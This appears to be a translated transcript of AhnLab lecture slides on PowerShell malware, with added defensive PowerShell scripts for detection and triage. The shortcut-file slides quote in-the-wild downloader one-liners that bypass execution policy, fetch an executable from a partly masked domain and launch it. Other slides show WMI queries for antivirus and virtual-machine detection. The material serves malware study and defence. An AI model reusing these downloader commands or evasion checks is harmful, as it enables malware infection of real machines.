PowerShell Malware Trends 20161118_CHA Minseok_Digital Forensics Technical Lecture, Public Edition
TRANSCRIPT
PowerMalware ?!
2016.11.18 – Public Edition
AhnLab Security Emergency response Center (ASEC), Analysis Team
CHA Minseok (차민석, 車珉錫, Jacky Cha, mstoned7), Senior Researcher
Malware and Techniques Using PowerShell
© AhnLab, Inc. All rights reserved.
:~$whoami
Profile
- CHA Minseok (차민석, 車珉錫, Jacky Cha, mstoned7)
- January 7, 1988: started with computers on an Apple ][+ clone
- 1989: infected by a Brain virus variant
- 1997: joined AhnLab
- Senior Malware Researcher, AhnLab
- Analyzing and researching malware in the Security Emergency response Center (ASEC) Analysis Team
- Member of the public-private joint investigation team and the cyber security expert group
- Member of vforum, AVED, AMTSO
- Wildlist Reporter
:~$whoami
• Books
- 보안에 미쳐라 (Be Crazy About Security, 2016)
* Source : http://www.yes24.com/24/goods/29333992
Before We Begin
• No system in this world has perfect security
- War Games, starring Matthew Broderick
* Source : War Games (1983)
Wrap up
• Increase in malware that uses PowerShell
- Follows the market share of Windows 7 and Windows 10
- Usually used as a ransomware downloader
- Starting to be observed in targeted attacks as well
• Use of WMI
- Fileless malware can be built with it
• Outlook
- PowerShell malware expected to increase alongside JS and VBS
- Possibility of multi-platform malware
Contents
01 PowerShell
02 Malware Using PowerShell
03 Technique
04 File Types
05 Fileless Technique
06 Case Study
07 Closing Remarks
01
PowerShell
PowerShell
• PowerShell
- Script language released in 2006
- Built into Windows Vista and later
* Source : https://msdn.microsoft.com/en-us/powershell
Windows Management Instrumentation (WMI)
• WMI
* Source : https://msdn.microsoft.com/en-us/library/aa394582(v=vs.85).aspx
Windows Management Instrumentation (WMI)
• WMI Architecture
* Source : http://oversitesentry.com/blackhat-presentation-wmi-architecture-used-to-attack/
PowerShell + WMI
• Getting antivirus product information
- Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
PowerShell + WMI
• Checking for a virtual environment
- Get-WmiObject -Class Win32_ComputerSystem
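The two queries above are the same ones malware runs to decide whether it is being watched. The following script is an added example, not code from the slides or from AhnLab: it runs both queries from the defender's side as a host triage step, so an analyst sees exactly what any script on the host can learn about the installed antivirus and the virtualization platform. It assumes a Windows client SKU (root\SecurityCenter2 does not exist on Windows Server) and PowerShell 3.0 or later; the productState bit interpretation and the hypervisor marker list are assumptions made for this example.

```powershell
# Added example (not from the original slides): defender-side host triage that
# runs the two WMI queries the slides show, so an analyst sees what any script
# on the host can learn about AV and virtualization.
# Assumptions: a Windows client SKU (root\SecurityCenter2 is absent on Windows
# Server) and PowerShell 3.0 or later for Get-CimInstance.

function Get-InstalledAntiVirus {
    # Products registered with Windows Security Center.
    $products = Get-CimInstance -Namespace 'root\SecurityCenter2' -ClassName AntiVirusProduct -ErrorAction SilentlyContinue
    foreach ($p in $products) {
        # productState is undocumented. The bit tests below follow the widely used
        # community interpretation (an assumption): 0x1000 = real-time protection on,
        # 0x10 = signatures out of date.
        $state = [int]$p.productState
        [pscustomobject]@{
            Name         = $p.displayName
            ProductState = ('0x{0:X6}' -f $state)
            Enabled      = (($state -band 0x1000) -ne 0)
            Outdated     = (($state -band 0x10) -ne 0)
            ExePath      = $p.pathToSignedProductExe
        }
    }
}

function Test-VirtualMachine {
    $cs = Get-CimInstance -ClassName Win32_ComputerSystem
    # Manufacturer/Model strings that common hypervisors report (constructed list; extend as needed).
    $markers = 'VMware', 'VirtualBox', 'Virtual Machine', 'QEMU', 'KVM', 'Xen', 'Parallels'
    $text = "$($cs.Manufacturer) $($cs.Model)"
    $matched = $markers | Where-Object { $text -match [regex]::Escape($_) } | Select-Object -First 1
    [pscustomobject]@{
        Manufacturer = $cs.Manufacturer
        Model        = $cs.Model
        IsVirtual    = [bool]$matched
        Matched      = $matched
    }
}

Get-InstalledAntiVirus | Format-Table -AutoSize
Test-VirtualMachine   | Format-List
```

Because this information is readable by any unprivileged process, the defensive value is in knowing it and logging it, not in hiding it: a host whose AntiVirusProduct row shows Enabled = False or Outdated = True is the one a PowerShell downloader will succeed on.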
02
Malware Using PowerShell
Timeline
(Figure: timeline with axis years 1993, 1998, 2000, 2004, 2006, 2007, 2013, 2014, 2015, 2016 and 2017; the year positions of the individual labels are not recoverable from the extraction except where the following slides state them.) Labels shown: Macro virus; improved batch virus; VB Script malware; Loveletter; Monad announced; PowerShell released; PowerShell malware PoC; PowerShell ransomware; Poweliks; Phase; Bedep; Kovter; fileless intrusions using WMI; PowerShell + Macro appears; flood of PowerShell downloaders.
1995 – Macro virus
• 1995–2001: the heyday of the macro virus
2000 - Loveletter
• May 4, 2000: LoveLetter virus
- Spread by email
- Used social engineering with the mail subject "I love you"
- Destroyed image and music files
2004 – Monad
• Concerns
- Monad developed in 2004
* Source : https://www.virusbulletin.com/conference/vb2004/abstracts/return-script-viruses
2006 - PowerShell malware PoC
• PowerShell PoC malware
* Source : https://www.symantec.com/security_response/writeup.jsp?docid=2006-080216-3625-99&tabid=2
2006 - PowerShell Released
• PowerShell Released
* Source : http://www.symantec.com/connect/ru/blogs/powershell-released?page=1
2013 – PowerShell Ransomware
• PowerShell ransomware appears
* Source : https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/
2014 - Poweliks
• Poweliks
- Stored inside the registry
* Source : http://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/
2014 - Phase
• Phase
- A variant of Solarbot, discovered in 2013
* Source : http://blog.trendmicro.com/trendlabs-security-intelligence/without-a-trace-fileless-malware-spotted-in-the-wild/
2015 – WMI abuse
• Black Hat 2015
* Source : https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
2015 - PowerShell malware starts to increase
• Increase in PowerShell malware
* Source : https://securelist.com/blog/research/72417/the-rise-of-net-and-powershell-malware/
2016 - Macro + PowerShell
• Macro + PowerShell
* Source : http://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-macro-based-attacks/
2016 - Malware using PowerShell becomes widespread
• Malware using PowerShell becomes widespread
* Source : https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
03
Technical
Conditions for In-the-Wild Malware
Conditions
- Many users
- Gaps in the security system
- Easy to create
Advantages of PowerShell Malware
Advantages
- Powerful functionality
- Easy to create
- Possibility of bypassing behavior-based products
Major Infection Paths
• Major infection paths
- Attachment or link (figure labels: icon, Web Browser)
- Via exploit kit
- Also used for fileless malware infection
Infection Path
Running PowerShell
• Execution permission
- Tested running the DownloadFile command individually versus as a script
- The individual command runs, but the script is not executed because of the policy
Running PowerShell
• Bypass PowerShell execution policies
* Source : https://technet.microsoft.com/en-us/library/ee176847.aspx
Running PowerShell
• Bypass PowerShell execution policies
* Source : http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html
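The test above makes the practical point: the execution policy stops a .ps1 file but not a command typed on the command line, and a process can switch it off for itself. The script below is an added example, not code from the slides or from AhnLab. It audits the policy across scopes, enables script block logging (the documented Group Policy registry location is assumed to be the one shown), and then searches the resulting 4104 events for the download primitives that the LNK one-liners later in this deck rely on. Writing the HKLM key requires an elevated prompt; PowerShell 5.0 or later is assumed.

```powershell
# Added example (not from the original slides): audit the execution policy and
# turn on script block logging. The execution policy is a safety feature, not a
# security boundary: the one-liner tests on the slides never consult it, and
# '-ExecutionPolicy bypass' turns it off per process. Detection therefore has to
# come from logging what PowerShell actually compiles and runs.
# Assumptions: PowerShell 5.0 or later on Windows; the registry path is the
# Group Policy location for the setting; writing HKLM needs an elevated prompt.

function Get-ExecutionPolicyReport {
    # One row per scope; the effective policy is the first non-Undefined scope from the top.
    Get-ExecutionPolicy -List | ForEach-Object {
        [pscustomobject]@{ Scope = $_.Scope; Policy = $_.ExecutionPolicy }
    }
}

function Enable-ScriptBlockLogging {
    # Produces event ID 4104 in Microsoft-Windows-PowerShell/Operational with the
    # de-obfuscated script text, including code that arrived via -EncodedCommand.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    New-Item -Path $key -Force | Out-Null
    Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord
}

function Get-SuspiciousScriptBlocks {
    param(
        [int]$Hours = 24,
        # Indicators taken from the LNK one-liners shown on the file-type slides.
        [string[]]$Keywords = @('DownloadFile', 'DownloadString', 'Net.WebClient', 'FromBase64String', 'Start-Process')
    )
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Properties[0..1] are the fragment counters; Properties[2] is the script block text.
        $text = [string]$_.Properties[2].Value
        $hits = $Keywords | Where-Object { $text -match [regex]::Escape($_) }
        if ($hits) {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Matched = ($hits -join ', ')
                Snippet = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
}

Get-ExecutionPolicyReport | Format-Table -AutoSize
# Enable-ScriptBlockLogging    # run once, elevated
Get-SuspiciousScriptBlocks | Format-Table -AutoSize -Wrap
```

The keyword list is deliberately short and will match legitimate administration scripts too; its purpose is to surface candidates for review, not to convict. Forward the 4104 events centrally so a host that is later wiped by ransomware still leaves the script text behind.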
Functionality
• Downloader or dropper
* Source : https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
04
File Types
Types
- Office (DOC, DOCM, XLS, XLSM)
- Shortcut (LNK)
- PowerShell (PS1)
- Windows Script File (WSF), HTML Application (HTA)
- JavaScript / Visual Basic Script (JS, JSE, VBS, VBE, WSF, HTA)
JavaScript - JS
• JavaScript (JS)
Visual Basic Script
• Visual Basic Script (VBS)
Windows Script File (WSF)
• WSF (Windows Script File)
- Mostly JavaScript
Windows Script File (WSF)
• WSF (Windows Script File)
HTML Application (HTA)
• HTML Application (HTA)
- Mostly JavaScript
Office (DOC, DOCM, XLS, XLSM)
• Documents containing macros
Shortcut (LNK)
• LNK
• Download
- %WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe $cmd = 'Start-Process';$b = '%TEMP%\tes'+'t3.e'+'xe'; $a = New-Object
System.Net.WebClient; $a.DownloadFile('http://*****ennox.com/wp-includes/putty.exe','%TEMP%\tes'+'t3.e'+'xe'); &($cmd) -FilePath
$b;
© AhnLab, Inc. All rights reserved. 46
Shortcut (LNK)
• Download
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object
System.Net.WebClient).DownloadFile('http://dire****.com/2D2A/bg.exe','%APPDATA%\Example.exe'); cmd /c '%APPDATA%\Example.exe'
© AhnLab, Inc. All rights reserved. 47
Shortcut (LNK)
• Encoding
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -EncodedCommand UABvAHc………
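The three LNK targets above share a small set of traits: a hidden window, a per-process policy bypass, a WebClient download, a file name spliced from string fragments, a launch of the dropped file, and (in the last one) a Base64-encoded command. The following is an added example, not code from the slides or from AhnLab, that turns those traits into triage logic an analyst can run over command lines recovered from LNK files or process-creation logs. It decodes -EncodedCommand payloads (UTF-16LE text in Base64; the prefix UABvAHc on the slide is "Pow") and scores each line. The sample lines are constructed from the structure of the slides with placeholder domains; the indicator regexes are assumptions chosen for this example.

```powershell
# Added example (not from the original slides): triage logic for command lines
# recovered from LNK targets or process-creation logs. It decodes -EncodedCommand
# payloads (Base64 of UTF-16LE text) and scores the indicator combination the
# slides show: hidden window, policy bypass, WebClient download, string splicing
# to hide a file name, and launching the dropped file. The sample lines below are
# constructed from the structure of the slides with placeholder domains.

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    # powershell.exe expects UTF-16LE here, so Unicode (not UTF8) is the right decoder.
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

function Get-CommandLineIndicators {
    param([Parameter(Mandatory)][string]$CommandLine)
    $text = $CommandLine
    $decoded = $null
    # Documented switch plus the abbreviations powershell.exe accepts.
    if ($text -match '-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})') {
        try { $decoded = ConvertFrom-EncodedCommand $Matches[1]; $text += ' ' + $decoded } catch { }
    }
    $checks = [ordered]@{
        EncodedCommand    = [bool]$decoded
        HiddenWindow      = [bool]($text -match '-w(?:indowstyle)?\s+hidden')
        PolicyBypass      = [bool]($text -match '-(?:ex|ep|executionpolicy)\s+bypass')
        NoProfile         = [bool]($text -match '-nop(?:rofile)?\b')
        WebClientDownload = [bool]($text -match 'Net\.WebClient' -and $text -match 'Download(?:File|String)')
        StringSplicing    = [bool]($text -match "'\s*\+\s*'")          # 'tes'+'t3.e'+'xe'
        LaunchAfterDrop   = [bool]($text -match 'Start-Process|cmd(?:\.exe)?\s*/c|&\s*\(')
    }
    $flags = @($checks.Keys | Where-Object { $checks[$_] })
    [pscustomobject]@{
        Score      = $flags.Count
        Indicators = ($flags -join ', ')
        Decoded    = $decoded
    }
}

# Constructed samples (placeholder domains, not real infrastructure).
$lnk1 = @'
%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe $cmd = 'Start-Process';$b = '%TEMP%\tes'+'t3.e'+'xe'; $a = New-Object System.Net.WebClient; $a.DownloadFile('http://example.invalid/wp-includes/putty.exe','%TEMP%\tes'+'t3.e'+'xe'); &($cmd) -FilePath $b;
'@
$lnk2 = @'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://example.invalid/2D2A/bg.exe','%APPDATA%\Example.exe'); cmd /c '%APPDATA%\Example.exe'
'@
# The slide shows only the prefix 'UABvAHc' (UTF-16LE "Pow"), so a benign stand-in is encoded here.
$b64  = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Write-Output "constructed sample"'))
$lnk3 = "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -EncodedCommand $b64"

$lnk1, $lnk2, $lnk3 | ForEach-Object { Get-CommandLineIndicators $_ } | Format-Table -AutoSize -Wrap
```

On the constructed samples the first line scores 3 (WebClientDownload, StringSplicing, LaunchAfterDrop), the second 5, and the third 1 with its decoded text exposed. The decoded text is the field worth keeping: an encoded command that turns out to be a WebClient download is the same downloader as the first two lines, only wrapped.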
PowerShell (PS1)
• PowerShell
05
Fileless Technique
Fileless
• Used as a fileless technique
- Poweliks
* Source : https://blog.gdatasoftware.com/2014/07/23947-poweliks-the-persistent-malware-without-a-file
Fileless
• Used as a fileless technique
- Poweliks
Fileless Malware
• Kovter
- The Run entry cannot be read
Fileless Malware
• Kovter
- Runs the script through mshta.exe
Fileless Malware
• Kovter
- Encoded data
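Both the Poweliks slides (payload stored inside the registry) and the Kovter slides (a Run entry that cannot be read, mshta.exe running a script, encoded data) describe persistence that leaves no file to scan. The script below is an added example, not code from the slides or from AhnLab, that inspects the Run keys for exactly those three traits: a value name containing control or non-printable characters that regedit cannot display, a launcher that hands a script to a script host rather than starting a file on disk, and a long encoded blob in the data. It reads through the .NET registry API so unusual value names come back unchanged. The regexes and the blob-length threshold are assumptions made for this example.

```powershell
# Added example (not from the original slides): inspect the autorun registry
# entries the Poweliks and Kovter slides describe, looking for three traits:
# a value name that regedit cannot display (control or non-printable characters),
# a launcher that hands a script to mshta.exe, rundll32.exe or powershell.exe
# instead of starting a file on disk, and a large encoded blob in the data.
# Reads through the .NET registry API so unusual value names come back as-is.
# The regexes and the size threshold are assumptions made for this example.

$RunLocations = @(
    @{ Hive = [Microsoft.Win32.Registry]::CurrentUser;  Path = 'Software\Microsoft\Windows\CurrentVersion\Run' },
    @{ Hive = [Microsoft.Win32.Registry]::LocalMachine; Path = 'Software\Microsoft\Windows\CurrentVersion\Run' }
)

function Test-UndisplayableName {
    param([string]$Name)
    # \p{C} covers control, format and unassigned code points; one of these in a
    # value name is what made the Kovter Run entry unreadable.
    return ($Name -match '\p{C}')
}

function Get-SuspiciousAutoruns {
    foreach ($loc in $RunLocations) {
        $key = $loc.Hive.OpenSubKey($loc.Path)
        if (-not $key) { continue }
        foreach ($name in $key.GetValueNames()) {
            $data = [string]$key.GetValue($name, '', 'DoNotExpandEnvironmentNames')
            $flags = @()
            if (Test-UndisplayableName $name) { $flags += 'UndisplayableName' }
            # Script hosts fed an inline script or a registry location rather than a file path.
            if ($data -match '\b(?:mshta|rundll32|powershell|wscript|cscript)(?:\.exe)?\b' -and
                $data -match '(?:javascript:|vbscript:|-EncodedCommand|-enc\b|GetObject\(|HKCU|HKLM|CurrentUser|LocalMachine)') {
                $flags += 'ScriptHostLauncher'
            }
            # A long Base64-looking run in the data itself (Kovter keeps encoded payloads in the registry).
            if ($data -match '[A-Za-z0-9+/=]{500,}') { $flags += 'EncodedBlob' }
            if ($flags.Count -gt 0) {
                [pscustomobject]@{
                    Hive        = $loc.Hive.Name
                    ValueName   = ($name -replace '\p{C}', '?')
                    Flags       = ($flags -join ', ')
                    DataPreview = $data.Substring(0, [Math]::Min(100, $data.Length))
                }
            }
        }
        $key.Close()
    }
}

Get-SuspiciousAutoruns | Format-Table -AutoSize -Wrap
```

Reading the value names through GetValueNames() rather than Get-ItemProperty matters: the unreadable entry on the Kovter slide is invisible to tools that stop at the first control character, and the same names are what a removal script has to pass back to DeleteValue() exactly as returned.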
06
Case Study
07
Closing Remarks
Error
• Windows PowerShell has stopped working
- A Windows PowerShell error can appear unexpectedly
Response
• WMI for Detection and Response
* Source : https://ics-cert.us-cert.gov/sites/default/files/documents/WMI_for_Detection_and_Response_S508C.pdf
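The WMI abuse described in the Black Hat 2015 paper cited earlier, and the detection-and-response view referenced on this slide, meet in the root\subscription namespace: a permanent event subscription is a filter (a WQL query that fires on some event), a consumer (the command or script to run) and a binding that ties them together. The following is an added example, not code from the slides or from AhnLab, that lists every binding with its trigger query and payload, so an analyst can spot a consumer that launches a script host. It is read-only and assumes PowerShell 3.0 or later.

```powershell
# Added example (not from the original slides): list permanent WMI event
# subscriptions, the persistence mechanism described in the Black Hat 2015 WMI
# paper cited earlier and a first check on a host showing PowerShell activity
# with no script on disk. Each binding is joined to its filter (the trigger
# query) and consumer (the command or script that runs), and the payload is
# screened for script hosts. Read-only; assumes PowerShell 3.0 or later.

function Get-ReferencedName {
    param($Ref)
    # Get-CimInstance returns reference properties as CimInstance objects, whereas a
    # raw WMI path is a string like '__EventFilter.Name="X"'; handle both forms.
    if ($Ref -is [string]) { return ($Ref -replace '.*Name="([^"]*)".*', '$1') }
    return $Ref.Name
}

function Get-WmiPersistence {
    $ns = 'root\subscription'
    $filters   = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter -ErrorAction SilentlyContinue)
    $consumers = @(Get-CimInstance -Namespace $ns -ClassName __EventConsumer -ErrorAction SilentlyContinue)
    $bindings  = @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue)
    foreach ($b in $bindings) {
        $fName = Get-ReferencedName $b.Filter
        $cName = Get-ReferencedName $b.Consumer
        $f = $filters   | Where-Object { $_.Name -eq $fName } | Select-Object -First 1
        $c = $consumers | Where-Object { $_.Name -eq $cName } | Select-Object -First 1
        # CommandLineEventConsumer exposes CommandLineTemplate; ActiveScriptEventConsumer exposes ScriptText.
        $payload = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } elseif ($c.ScriptText) { $c.ScriptText } else { '' }
        $cType   = if ($c) { $c.CimClass.CimClassName } else { 'missing' }
        [pscustomobject]@{
            Filter       = $fName
            Query        = $f.Query
            ConsumerType = $cType
            Payload      = $payload
            Suspicious   = [bool]($payload -match 'powershell|mshta|rundll32|wscript|cscript|cmd(?:\.exe)?\s*/c|-enc\b|FromBase64String')
        }
    }
}

Get-WmiPersistence | Format-Table -AutoSize -Wrap
```

A legitimate host usually has very few entries here (management agents register some), so the list is short enough to read in full; an ActiveScriptEventConsumer or a CommandLineEventConsumer whose template starts powershell.exe or mshta.exe deserves the same attention as an unknown Run key. Removal is done by deleting the binding, filter and consumer instances with Remove-CimInstance once the trigger and payload have been recorded.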
Outlook
• Expansion of PowerShell
* Source : https://blogs.msdn.microsoft.com/powershell/2016/08/18/powershell-on-linux-and-open-source-2
Outlook
Outlook
- Replacing JS and VBS?!
- Obfuscation
- Cross-Platform
Today's Security Problem
• Not really a fair fight
* Source : http://image-store.slidesharecdn.com/81268b95-5c3b-4604-9129-d83ab3dc4600-large.png
Today's Security Problem
• Security is something everyone has to do together
* Source : http://www.security-marathon.be/?p=1786
Q&A
email : [email protected] / [email protected]
http://xcoolcat7.tistory.com
https://twitter.com/xcoolcat7, https://twitter.com/mstoned7
Reference
• Ryan Kazanciyan & Matt Hastings, 'Investigating PowerShell Attacks', 2014
• Matt Graeber, 'Abusing Windows Management Instrumentation (WMI) to Build a Persistent, Asynchronous, and Fileless Backdoor', 2015
• Santiago M. Pontiroli & F. Roberto Martinez, 'The Tao of .NET and PowerShell Malware Analysis', 2015
• Kim Seunghoon / AhnLab, 'Analysis of Macro Downloaders' (매크로 다운로더 분석), 2016